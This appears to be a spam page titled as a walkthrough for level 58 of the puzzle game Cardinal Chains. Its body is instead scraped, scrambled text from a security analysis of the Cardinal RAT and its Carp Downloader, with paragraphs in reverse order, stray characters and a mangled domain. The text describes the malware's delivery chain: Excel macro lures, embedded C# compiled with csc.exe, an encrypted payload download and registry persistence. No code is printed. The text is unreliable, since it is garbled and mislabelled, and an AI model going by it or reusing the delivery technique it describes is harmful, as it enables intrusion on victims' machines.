- #Cardinal chains level 58 walkthrough full
- #Cardinal chains level 58 walkthrough code
- #Cardinal chains level 58 walkthrough download
- #Cardinal chains level 58 walkthrough windows
Specifically, this newly spawned executable will ensure that the following registry key is set:
#Cardinal chains level 58 walkthrough code
It will then compile and execute embedded source code that contains watchdog functionality. Cardinal RAT will copy itself to a randomly named executable in the specified directory. Should it not match the expected path, Cardinal will enter its installation routine.
When initially executed, the malware will check its current working directory.
#Cardinal chains level 58 walkthrough full
This allowed us to not only easily identify the full functionality of the RAT, but also made it easier to identify and reverse-engineer various aspects of the malware itself.įigure 11 Decompiled Cardinal RAT classes
A subset of these may be seen below in Figure 11. It is likely that the low volume of samples seen in the wild is partly responsible for the fact that this malware family has remained under the radar for so long.Īn unobfuscated copy of Cardinal RAT was identified, which allowed us to view the decompiled class and function names. To date, 27 unique samples of Cardinal RAT have been observed, dating back to December 2015. The name Cardinal RAT comes from internal names used by the author within the observed Microsoft. Based on the similarities witnessed in some of these lures, it appears that the attackers use some sort of template, where they simply swap specific cells with the pertinent images or information. The following figures show lures that we observed in these samples.įigure 5 Lure with a filename of Top10Binary_Sample_HotLeads_13.9.xlsįigure 6 Lure with a filename of AC_Media_Leads_ReportGenerator_5.2.xlsįigure 8 Lure with a filename of Arabic 22.12_Pre qualified.xlsįigure 10 Lure with a filename of Hot_Leads_Export_09.03_EN.xlsĪs we can see from the above examples, the majority of these lures are financial-related, describing various fake customer lists for various organizations.
#Cardinal chains level 58 walkthrough download
Of course, the Carp Downloader is not required to download Cardinal RAT, however, based on our visibility, it has exclusively done so.Ī total of 11 unique Carp Downloader samples have been observed to date. At this point, Cardinal RAT has been downloaded and executed, and execution is directed to this sample. The decoded source code in this example looks like the following as shown in Figure 4.Īs we can see, it simply downloads a file from secure.dropinboxpw using HTTP on port 443 (not HTTPS), and proceeds to decrypt the file using AES-128 prior to executing it.
#Cardinal chains level 58 walkthrough windows
Finally, as shown in Figure 3 it will compile and execute this C# source code using the Microsoft Windows built-in csc.exe utility. It then base64-decodes the embedded C# source code as shown in Figure 2 and writes it to the C# file path previously generated. Additionally, we have added comments to explain what is happening, as well as the un-obfuscated strings that are found within the macro.įigure 2 Portion of malicious macro containing base64-encoded source codeįigure 3 Portion of malicious macro responsible for compiling and executing embedded source codeĪs a quick recap of what the malicious macro is doing, it begins by generating two paths-a path to a randomly named executable, and randomly named C# file in the %APPDATA%\\Microsoft folder. Note that we have prefixed the function names with ‘xx_’ to make it easier for the reader to understand what is going on. We observed the following example macro in the most recent sample. We are calling these delivery documents the Carp Downloader, as they make use of a specific technique of compiling and executing embedded C# (CshARP) language source code that acts as a simple downloader. The malware from start to finish exhibits the following high level operations as shown in Figure 1:įigure 1 Malware execution flow Carp DownloaderĪs previously mentioned, we have observed Cardinal RAT being delivered using a unique technique involving malicious Excel macros. These malicious Excel files use a number of different lures, providing evidence of what attackers are using to entice victims into executing them. The malware is delivered via an innovative and unique technique: a downloader we are calling Carp uses malicious macros in Microsoft Excel documents to compile embedded C# (C Sharp) Programming Language source code into an executable that in turn is run to deploy the Cardinal RAT malware family. It has a very low volume in this two-year period, totaling roughly 27 total samples. Palo Alto Networks has discovered a previously unknown remote access Trojan (RAT) that has been active for over two years.
0 kommentar(er)
